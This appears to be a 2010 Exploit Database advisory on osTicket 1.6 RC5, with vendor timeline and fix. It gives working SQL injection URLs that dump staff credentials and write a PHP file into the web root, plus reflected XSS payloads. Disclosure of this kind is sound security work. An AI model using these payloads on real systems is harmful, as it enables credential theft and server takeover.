osTicket 1.6 RC5 – Multiple Vulnerabilities

• Exploit Database
• 39 阅读

• 作者： Nahuel Grisolia
  日期： 2010-02-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11380/

• Advisory Name: SQL injection in osTicket
  
  Vulnerability Class: SQL injection
  
  Release Date: 2010-02-09
  
  Affected Applications: Confirmed in osTicket 1.6 RC5. Other versions may also be affected.
  
  Affected Platforms: Multiple
  
  Local / Remote: Remote
  
  Severity: High – CVSS: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
  
  Researcher: Nahuel Grisolía
  
  Vendor Status: Acknowledged/Fixed. New release available: osTicket 1.6 Stable or check
  http://osticket.com/forums/project.php?issueid=176
  
  Vulnerability Description:
  
  A Vulnerability has been discovered in osTicket, which can be exploited by malicious people to
  conduct SQL injection attacks.
  Input passed via the "input" parameter to ajax.php is not properly sanitized before being used in a SQL
  query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
  The vulnerability is confirmed in version 1.6 RC5. Other versions may also be affected.
  
  Proof of Concept:
  
  http://x.x.x.x/upload/scp/ajax.php?api=tickets&f=searchbyemail&input=nah%27%20%20union%20sel
  ect%20username,passwd%20from%20ost_staff--%20and%20%27%%27%20LIKE%20%27
  
  http://x.x.x.x/upload/scp/ajax.php?api=tickets&f=searchbyemail&input=nah%27%20%20union%20sel
  ect%20%27%3C?php%20phpinfo%28%29;%20?%3E%27,%27%27%20into%20outfile%20%27/var/
  www/upload/images/info.php%27--%20and%20%27%%27%20LIKE%20%27
  
  Impact: Execute arbitrary SQL queries.
  
  Solution: Upgrade to osTicket 1.6 Stable or check http://osticket.com/forums/project.php?issueid=176
  
  Vendor Response:
  
  January 9, 2010 – First Contact
  January 10, 2010 / February 4, 2010 – Updates on resolution
  February 9, 2010 – Latest version and patch available
  February 9, 2010 – Public Disclosure of the Vulnerability
  
  Contact Information:
  
  For more information regarding the vulnerability feel free to contact the researcher at
  nahuel.grisolia <at> gmail <dot> com
  
  Reflective XSS:
  
  Advisory Name: Reflected Cross-Site Scripting (XSS) in osTicket
  
  Vulnerability Class: Reflected Cross-Site Scripting (XSS)
  
  Release Date: 2010-02-09
  
  Affected Applications: Confirmed in osTicket 1.6 RC5. Other versions may also be affected
  
  Affected Platforms: Multiple
  
  Local / Remote: Remote
  
  Severity: Medium – CVSS: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
  
  Researcher: Nahuel Grisolía
  
  Vendor Status: Acknowledged/Fixed. New release available: osTicket 1.6 Stable or check
  http://osticket.com/forums/project.php?issueid=176
  
  Vulnerability Description:
  
  A reflected Cross Site Scripting vulnerability was found in osTicket 1.6 RC5, because the application
  fails to sanitize user-supplied input. Any logged-in user can trigger the vulnerability.
  
  Proof of Concept:
  
  http://x.x.x.x/upload/scp/ajax.php?api=1%3Cscript%3Ealert%28%22xss%22%29;%3C/script%3E&f=
  cannedResp
  
  http://x.x.x.x/upload/scp/ajax.php?api=kbase&f=%3Cscript%3Ealert%28%22xss%22%29;%3C/script
  %3E
  
  Impact:
  
  An affected user may unintentionally execute scripts or actions written by an attacker. In addition, an
  attacker may obtain authorization cookies that would allow him to gain unauthorized access to the
  application.
  
  Solution: Upgrade to osTicket 1.6 Stable or check http://osticket.com/forums/project.php?issueid=176
  
  Vendor Response:
  
  January 9, 2010 – First Contact
  January 10, 2010 / February 4, 2010 – Updates on resolution
  February 9, 2010 – Latest version and patch available
  February 9, 2010 – Public Disclosure of the Vulnerability
  
  Contact Information:
  
  For more information regarding the vulnerability feel free to contact the researcher at
  nahuel.grisolia <at> gmail <dot> com